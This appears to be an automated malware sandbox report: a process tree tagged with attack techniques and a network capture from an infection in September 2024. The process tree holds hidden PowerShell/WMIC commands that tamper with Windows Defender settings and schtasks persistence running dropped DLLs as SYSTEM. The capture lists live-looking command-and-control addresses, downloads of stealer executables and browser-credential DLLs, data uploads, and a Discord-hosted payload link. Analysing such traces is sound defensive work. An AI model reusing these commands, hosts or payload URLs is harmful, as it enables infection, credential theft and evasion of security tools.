PID:2020 -
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True7⤵
- Suspicious use of AdjustPrivilegeToken
PID:1604
-
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True"4⤵
- Indirect Command Execution
- System Location Discovery: System Language Discovery
PID:1468 -
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True5⤵
- System Location Discovery: System Language Discovery
PID:796 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True6⤵
- Command and Scripting Interpreter: PowerShell
PID:756 -
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True7⤵PID:1032
-
-
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\kVyftiaSU\QwjSJr.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "HlGMqKYvccXUYlk" /V1 /F3⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:1304
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "HlGMqKYvccXUYlk2" /F /xml "C:\Program Files (x86)\kVyftiaSU\SIqgEfJ.xml" /RU "SYSTEM"3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:2904
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "HlGMqKYvccXUYlk"3⤵PID:2392
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "HlGMqKYvccXUYlk"3⤵PID:892
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "jcvlsaWlukqsKE" /F /xml "C:\Program Files (x86)\vECSWYHhNEBU2\MMtAEvz.xml" /RU "SYSTEM"3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:1552
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "DNmCZKMScDllc2" /F /xml "C:\ProgramData\NUEAEvpmbtRdsZVB\zHFWLzh.xml" /RU "SYSTEM"3⤵
- Scheduled Task/Job: Scheduled Task
PID:2512
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "SebvePPLQQlbTkynf2" /F /xml "C:\Program Files (x86)\TcokmJWkeMGVDHpHTSR\vMxVtgP.xml" /RU "SYSTEM"3⤵
- Scheduled Task/Job: Scheduled Task
PID:796
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "BvByqijJTTwWPkViWve2" /F /xml "C:\Program Files (x86)\EKfHLQOzikZzC\agSfxQf.xml" /RU "SYSTEM"3⤵
- Scheduled Task/Job: Scheduled Task
PID:1252
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "hjqxuCHRKqyyPIyfi" /SC once /ST 03:37:22 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\VLvKqTazivYGshTO\lEQZCeVN\bhXaBQO.dll\",#1 /kdidGeF 385121" /V1 /F3⤵
- Drops file in Windows directory
- Scheduled Task/Job: Scheduled Task
PID:2848
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "hjqxuCHRKqyyPIyfi"3⤵PID:1616
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "cszbzSIAjSjUwyOsr"3⤵
- System Location Discovery: System Language Discovery
PID:2256
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2300 -s 15483⤵
- Loads dropped DLL
- Program crash
PID:1876
-
-
-
C:\Windows\system32\rundll32.EXEC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\VLvKqTazivYGshTO\lEQZCeVN\bhXaBQO.dll",#1 /kdidGeF 3851212⤵PID:2244
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\VLvKqTazivYGshTO\lEQZCeVN\bhXaBQO.dll",#1 /kdidGeF 3851213⤵
- Blocklisted process makes network request
- Checks BIOS information in registry
- Loads dropped DLL
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
- Enumerates system info in registry
- Modifies data under HKEY_USERS
PID:1512 -
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "hjqxuCHRKqyyPIyfi"4⤵
- System Location Discovery: System Language Discovery
PID:1492
-
-
-
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:2180
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:2432
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:2488
Network
-
Remote address:185.215.113.16:80RequestPOST /Jo89Ku7d/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 185.215.113.16
Content-Length: 4
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Date: Mon, 16 Sep 2024 05:01:37 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Refresh: 0; url = Login.php
-
Remote address:185.215.113.16:80RequestPOST /Jo89Ku7d/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 185.215.113.16
Content-Length: 156
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Date: Mon, 16 Sep 2024 05:01:37 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
-
Remote address:185.215.113.16:80RequestPOST /Jo89Ku7d/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 185.215.113.16
Content-Length: 31
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Date: Mon, 16 Sep 2024 05:01:39 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
-
Remote address:185.215.113.16:80RequestGET /inc/crypteda.exe HTTP/1.1
Host: 185.215.113.16
ResponseHTTP/1.1 200 OK
Date: Mon, 16 Sep 2024 05:01:39 GMT
Content-Type: application/octet-stream
Content-Length: 1165824
Last-Modified: Thu, 12 Sep 2024 13:56:33 GMT
Connection: keep-alive
ETag: "66e2f311-11ca00"
Accept-Ranges: bytes
-
Remote address:185.215.113.16:80RequestPOST /Jo89Ku7d/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 185.215.113.16
Content-Length: 31
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Date: Mon, 16 Sep 2024 05:01:40 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
-
Remote address:185.215.113.16:80RequestPOST /Jo89Ku7d/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 185.215.113.16
Content-Length: 31
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Date: Mon, 16 Sep 2024 05:01:42 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
-
Remote address:185.215.113.16:80RequestGET /inc/stealc_default2.exe HTTP/1.1
Host: 185.215.113.16
ResponseHTTP/1.1 200 OK
Date: Mon, 16 Sep 2024 05:01:42 GMT
Content-Type: application/octet-stream
Content-Length: 192000
Last-Modified: Sat, 24 Aug 2024 14:58:01 GMT
Connection: keep-alive
ETag: "66c9f4f9-2ee00"
Accept-Ranges: bytes
-
Remote address:185.215.113.16:80RequestPOST /Jo89Ku7d/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 185.215.113.16
Content-Length: 31
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Date: Mon, 16 Sep 2024 05:01:43 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
-
Remote address:185.215.113.16:80RequestPOST /Jo89Ku7d/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 185.215.113.16
Content-Length: 31
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Date: Mon, 16 Sep 2024 05:01:57 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
-
Remote address:185.215.113.16:80RequestPOST /Jo89Ku7d/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 185.215.113.16
Content-Length: 31
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Date: Mon, 16 Sep 2024 05:02:00 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
-
Remote address:185.215.113.16:80RequestGET /inc/penis.exe HTTP/1.1
Host: 185.215.113.16
ResponseHTTP/1.1 200 OK
Date: Mon, 16 Sep 2024 05:02:00 GMT
Content-Type: application/octet-stream
Content-Length: 506368
Last-Modified: Tue, 10 Sep 2024 19:10:31 GMT
Connection: keep-alive
ETag: "66e099a7-7ba00"
Accept-Ranges: bytes
-
Remote address:185.215.113.16:80RequestPOST /Jo89Ku7d/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 185.215.113.16
Content-Length: 31
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Date: Mon, 16 Sep 2024 05:02:02 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
-
Remote address:185.215.113.16:80RequestGET /inc/bundle.exe HTTP/1.1
Host: 185.215.113.16
ResponseHTTP/1.1 200 OK
Date: Mon, 16 Sep 2024 05:02:02 GMT
Content-Type: application/octet-stream
Content-Length: 311296
Last-Modified: Fri, 06 Sep 2024 02:12:34 GMT
Connection: keep-alive
ETag: "66da6512-4c000"
Accept-Ranges: bytes
-
Remote address:185.215.113.16:80RequestPOST /Jo89Ku7d/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 185.215.113.16
Content-Length: 31
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Date: Mon, 16 Sep 2024 05:02:03 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
-
Remote address:185.215.113.16:80RequestGET /dobre/acentric.exe HTTP/1.1
Host: 185.215.113.16
ResponseHTTP/1.1 200 OK
Date: Mon, 16 Sep 2024 05:02:03 GMT
Content-Type: application/octet-stream
Content-Length: 464896
Last-Modified: Sat, 07 Sep 2024 22:52:49 GMT
Connection: keep-alive
ETag: "66dcd941-71800"
Accept-Ranges: bytes
-
Remote address:185.215.113.16:80RequestPOST /Jo89Ku7d/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 185.215.113.16
Content-Length: 31
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Date: Mon, 16 Sep 2024 05:02:04 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
-
Remote address:185.215.113.16:80RequestGET /inc/2.exe HTTP/1.1
Host: 185.215.113.16
ResponseHTTP/1.1 200 OK
Date: Mon, 16 Sep 2024 05:02:05 GMT
Content-Type: application/octet-stream
Content-Length: 689664
Last-Modified: Mon, 05 Aug 2024 00:09:39 GMT
Connection: keep-alive
ETag: "66b01843-a8600"
Accept-Ranges: bytes
-
Remote address:185.215.113.16:80RequestPOST /Jo89Ku7d/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 185.215.113.16
Content-Length: 31
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Date: Mon, 16 Sep 2024 05:02:06 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
-
Remote address:185.215.113.16:80RequestGET /dobre/splwow64.exe HTTP/1.1
Host: 185.215.113.16
ResponseHTTP/1.1 200 OK
Date: Mon, 16 Sep 2024 05:02:06 GMT
Content-Type: application/octet-stream
Content-Length: 1381143
Last-Modified: Fri, 13 Sep 2024 12:59:12 GMT
Connection: keep-alive
ETag: "66e43720-151317"
Accept-Ranges: bytes
-
Remote address:185.215.113.16:80RequestPOST /Jo89Ku7d/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 185.215.113.16
Content-Length: 31
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Date: Mon, 16 Sep 2024 05:02:08 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
-
Remote address:185.215.113.16:80RequestPOST /Jo89Ku7d/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 185.215.113.16
Content-Length: 31
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Date: Mon, 16 Sep 2024 05:02:10 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
-
Remote address:185.215.113.16:80RequestPOST /Jo89Ku7d/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 185.215.113.16
Content-Length: 31
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Date: Mon, 16 Sep 2024 05:02:13 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
-
Remote address:185.215.113.117:80RequestGET /inc/gold.exe HTTP/1.1
Host: 185.215.113.117
ResponseHTTP/1.1 200 OK
Date: Mon, 16 Sep 2024 05:01:37 GMT
Content-Type: application/octet-stream
Content-Length: 320000
Last-Modified: Wed, 11 Sep 2024 19:08:04 GMT
Connection: keep-alive
ETag: "66e1ea94-4e200"
Accept-Ranges: bytes
-
Remote address:185.215.113.117:80RequestGET /inc/needmoney.exe HTTP/1.1
Host: 185.215.113.117
ResponseHTTP/1.1 200 OK
Date: Mon, 16 Sep 2024 05:01:57 GMT
Content-Type: application/octet-stream
Content-Length: 4278784
Last-Modified: Thu, 12 Sep 2024 13:56:06 GMT
Connection: keep-alive
ETag: "66e2f2f6-414a00"
Accept-Ranges: bytes
-
Remote address:185.215.113.117:80RequestGET /inc/crypted.exe HTTP/1.1
Host: 185.215.113.117
ResponseHTTP/1.1 200 OK
Date: Mon, 16 Sep 2024 05:02:08 GMT
Content-Type: application/octet-stream
Content-Length: 321024
Last-Modified: Fri, 13 Sep 2024 21:22:58 GMT
Connection: keep-alive
ETag: "66e4ad32-4e600"
Accept-Ranges: bytes
-
Remote address:185.215.113.26:80RequestGET /Nework.exe HTTP/1.1
Host: 185.215.113.26
ResponseHTTP/1.1 200 OK
Date: Mon, 16 Sep 2024 05:01:41 GMT
Content-Type: application/x-msdos-program
Content-Length: 425984
Connection: keep-alive
Last-Modified: Sat, 24 Aug 2024 17:17:20 GMT
ETag: "68000-620711078a800"
Accept-Ranges: bytes
-
Remote address:185.215.113.26:80RequestPOST /Dem7kTu/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 185.215.113.26
Content-Length: 4
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Date: Mon, 16 Sep 2024 05:01:42 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Refresh: 0; url = Login.php
-
Remote address:185.215.113.26:80RequestPOST /Dem7kTu/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 185.215.113.26
Content-Length: 156
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Date: Mon, 16 Sep 2024 05:01:42 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
-
Remote address:185.215.113.17:80RequestGET / HTTP/1.1
Host: 185.215.113.17
Connection: Keep-Alive
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 0
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
-
Remote address:185.215.113.17:80RequestPOST /2fb6c2cc8dce150a.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----JDGHIIJKEBGIDHIDBKJD
Host: 185.215.113.17
Content-Length: 214
Connection: Keep-Alive
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Server: Apache/2.4.41 (Ubuntu)
Vary: Accept-Encoding
Content-Length: 180
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
-
Remote address:185.215.113.17:80RequestPOST /2fb6c2cc8dce150a.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----JDAKJDAAFBKFHIEBFCFB
Host: 185.215.113.17
Content-Length: 268
Connection: Keep-Alive
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Server: Apache/2.4.41 (Ubuntu)
Vary: Accept-Encoding
Content-Length: 1520
Keep-Alive: timeout=5, max=98
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
-
Remote address:185.215.113.17:80RequestPOST /2fb6c2cc8dce150a.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----JKJEHJKJEBGHJJKEBGIE
Host: 185.215.113.17
Content-Length: 267
Connection: Keep-Alive
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Server: Apache/2.4.41 (Ubuntu)
Vary: Accept-Encoding
Content-Length: 7116
Keep-Alive: timeout=5, max=97
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
-
Remote address:185.215.113.17:80RequestPOST /2fb6c2cc8dce150a.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----KFCGDBAKKKFBGDHJKFHJ
Host: 185.215.113.17
Content-Length: 268
Connection: Keep-Alive
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Server: Apache/2.4.41 (Ubuntu)
Vary: Accept-Encoding
Content-Length: 108
Keep-Alive: timeout=5, max=96
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
-
Remote address:185.215.113.17:80RequestPOST /2fb6c2cc8dce150a.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----EHCFBFBAEBKJKEBGCAEH
Host: 185.215.113.17
Content-Length: 5051
Connection: Keep-Alive
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 0
Keep-Alive: timeout=5, max=95
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
-
Remote address:185.215.113.17:80RequestGET /f1ddeb6592c03206/sqlite3.dll HTTP/1.1
Host: 185.215.113.17
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Server: Apache/2.4.41 (Ubuntu)
Last-Modified: Mon, 05 Sep 2022 11:30:30 GMT
ETag: "10e436-5e7ec6832a180"
Accept-Ranges: bytes
Content-Length: 1106998
Content-Type: application/x-msdos-program
-
Remote address:185.215.113.17:80RequestPOST /2fb6c2cc8dce150a.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----GIDAECGDAFBAAAAAECGI
Host: 185.215.113.17
Content-Length: 363
Connection: Keep-Alive
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 0
Keep-Alive: timeout=5, max=93
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
-
Remote address:185.215.113.17:80RequestGET /f1ddeb6592c03206/freebl3.dll HTTP/1.1
Host: 185.215.113.17
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Server: Apache/2.4.41 (Ubuntu)
Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
ETag: "a7550-5e7e950876500"
Accept-Ranges: bytes
Content-Length: 685392
Content-Type: application/x-msdos-program
-
Remote address:185.215.113.17:80RequestGET /f1ddeb6592c03206/mozglue.dll HTTP/1.1
Host: 185.215.113.17
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Server: Apache/2.4.41 (Ubuntu)
Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
ETag: "94750-5e7e950876500"
Accept-Ranges: bytes
Content-Length: 608080
Content-Type: application/x-msdos-program
-
Remote address:185.215.113.17:80RequestGET /f1ddeb6592c03206/msvcp140.dll HTTP/1.1
Host: 185.215.113.17
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Server: Apache/2.4.41 (Ubuntu)
Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
ETag: "6dde8-5e7e950876500"
Accept-Ranges: bytes
Content-Length: 450024
Content-Type: application/x-msdos-program
-
Remote address:185.215.113.17:80RequestGET /f1ddeb6592c03206/nss3.dll HTTP/1.1
Host: 185.215.113.17
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Server: Apache/2.4.41 (Ubuntu)
Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
ETag: "1f3950-5e7e950876500"
Accept-Ranges: bytes
Content-Length: 2046288
Content-Type: application/x-msdos-program
-
Remote address:185.215.113.17:80RequestGET /f1ddeb6592c03206/softokn3.dll HTTP/1.1
Host: 185.215.113.17
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Server: Apache/2.4.41 (Ubuntu)
Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
ETag: "3ef50-5e7e950876500"
Accept-Ranges: bytes
Content-Length: 257872
Content-Type: application/x-msdos-program
-
Remote address:185.215.113.17:80RequestGET /f1ddeb6592c03206/vcruntime140.dll HTTP/1.1
Host: 185.215.113.17
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Server: Apache/2.4.41 (Ubuntu)
Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
ETag: "13bf0-5e7e950876500"
Accept-Ranges: bytes
Content-Length: 80880
Content-Type: application/x-msdos-program
-
Remote address:185.215.113.17:80RequestPOST /2fb6c2cc8dce150a.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----BKJKEBGDHDAFHJKEGIID
Host: 185.215.113.17
Content-Length: 827
Connection: Keep-Alive
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 0
Keep-Alive: timeout=5, max=86
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
-
Remote address:185.215.113.17:80RequestPOST /2fb6c2cc8dce150a.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----HIIIDAKKJJJKKECAKKJE
Host: 185.215.113.17
Content-Length: 267
Connection: Keep-Alive
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Server: Apache/2.4.41 (Ubuntu)
Vary: Accept-Encoding
Content-Length: 2408
Keep-Alive: timeout=5, max=85
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
-
Remote address:185.215.113.17:80RequestPOST /2fb6c2cc8dce150a.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----BAEBFIIECBGCBGDHCAFC
Host: 185.215.113.17
Content-Length: 265
Connection: Keep-Alive
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 0
Keep-Alive: timeout=5, max=84
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
-
Remote address:185.215.113.17:80RequestPOST /2fb6c2cc8dce150a.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----GDBKKFHIEGDHJKECAAKK
Host: 185.215.113.17
Content-Length: 363
Connection: Keep-Alive
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 0
Keep-Alive: timeout=5, max=83
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
-
Remote address:185.215.113.17:80RequestPOST /2fb6c2cc8dce150a.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----EGDGIIJJECFIDHJJKKFC
Host: 185.215.113.17
Content-Length: 272
Connection: Keep-Alive
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 0
Keep-Alive: timeout=5, max=82
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
-
Remote address:185.215.113.17:80RequestPOST /2fb6c2cc8dce150a.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----JEGHDAFIDGDAAKEBFHDA
Host: 185.215.113.17
Content-Length: 272
Connection: Keep-Alive
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 0
Keep-Alive: timeout=5, max=81
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
-
Remote address:103.130.147.211:80RequestGET /Files/2.exe HTTP/1.1
Host: 103.130.147.211
ResponseHTTP/1.1 200 OK
Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
Last-Modified: Mon, 16 Sep 2024 00:25:38 GMT
ETag: "65b09f-622319cb8466e"
Accept-Ranges: bytes
Content-Length: 6664351
Content-Type: application/x-msdownload
-
Remote address:91.202.233.158:80RequestGET / HTTP/1.1
Host: 91.202.233.158
Connection: Keep-Alive
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 0
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
-
Remote address:91.202.233.158:80RequestPOST /e96ea2db21fa9a1b.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----IECGIEBAEBFIIECBGCBG
Host: 91.202.233.158
Content-Length: 213
Connection: Keep-Alive
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 8
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
-
Remote address:8.8.8.8:53Requestfivevd5vs.topIN AResponsefivevd5vs.topIN A188.225.44.114
-
Remote address:188.225.44.114:80RequestPOST /v1/upload.php HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Content-Type: multipart/form-data; boundary=----Boundary38542015
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Content-Length: 412
Host: fivevd5vs.top
ResponseHTTP/1.1 200 OK
Date: Mon, 16 Sep 2024 05:02:05 GMT
Content-Type: text/plain; charset=utf-8
Content-Length: 2
Connection: close
ETag: W/"2-nOO9QiTIwXgNtWtBJezz8kv3SLc"
-
Remote address:188.225.44.114:80RequestPOST /v1/upload.php HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Content-Type: multipart/form-data; boundary=----Boundary79302191
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Content-Length: 73186
Host: fivevd5vs.top
ResponseHTTP/1.1 200 OK
Date: Mon, 16 Sep 2024 05:02:09 GMT
Content-Type: text/plain; charset=utf-8
Content-Length: 2
Connection: close
ETag: W/"2-nOO9QiTIwXgNtWtBJezz8kv3SLc"
-
Remote address:194.58.114.223:80RequestGET /d/385121 HTTP/1.1
Host: 194.58.114.223
ResponseHTTP/1.1 302 Found
Date: Mon, 16 Sep 2024 05:02:10 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Keep-Alive: timeout=120
Location: https://cdn.discordapp.com/attachments/1274634716451967060/1285074049633878027/setup.exe?ex=66e8f1f8&is=66e7a078&hm=bf6f732aa37195abbc07bd02c5720e5642c2ebb828ca528169c8989a9af4f31b&
-
Remote address:8.8.8.8:53Requestcdn.discordapp.comIN AResponsecdn.discordapp.comIN A162.159.129.233cdn.discordapp.comIN A162.159.130.233cdn.discordapp.comIN A162.159.133.233cdn.discordapp.comIN A162.159.135.233cdn.discordapp.comIN A162.159.134.233
-
GEThttps://cdn.discordapp.com/attachments/1274634716451967060/1285074049633878027/setup.exe?ex=66e8f1f8&is=66e7a078&hm=bf6f732aa37195abbc07bd02c5720e5642c2ebb828ca528169c8989a9af4f31b&axplong.exeRemote address:162.159.129.233:443RequestGET /attachments/1274634716451967060/1285074049633878027/setup.exe?ex=66e8f1f8&is=66e7a078&hm=bf6f732aa37195abbc07bd02c5720e5642c2ebb828ca528169c8989a9af4f31b& HTTP/1.1
Connection: Keep-Alive
Host: cdn.discordapp.com
ResponseHTTP/1.1 200 OK
Content-Type: application/x-msdos-program
Content-Length: 7596406
Connection: keep-alive
CF-Ray: 8c3e4d8ea856cd8d-LHR
CF-Cache-Status: HIT
Accept-Ranges: bytes, bytes
Age: 6969
Cache-Control: public, max-age=31536000
Content-Disposition: attachment; filename="setup.exe"
ETag: "f749bd4f76ac073c55a3b937e6b7eac1"
Expires: Tue, 16 Sep 2025 05:02:12 GMT
Last-Modified: Mon, 16 Sep 2024 03:05:29 GMT
Vary: Accept-Encoding
alt-svc: h3=":443"; ma=86400
x-goog-generation: 1726455929025847
x-goog-hash: crc32c=jw3GXw==
x-goog-hash: md5=90m9T3asBzxVo7k35rfqwQ==
x-goog-metageneration: 1
x-goog-storage-class: STANDARD
x-goog-stored-content-encoding: identity
x-goog-stored-content-length: 7596406
x-guploader-uploadid: AD-8ljs0l2XUZUJmIdg7bHqCaQOuqkC9iUV5YE3gaO-glU49f3iZBoAGO0JGXGmfXYFZ59MHmvGWp_iORA
X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
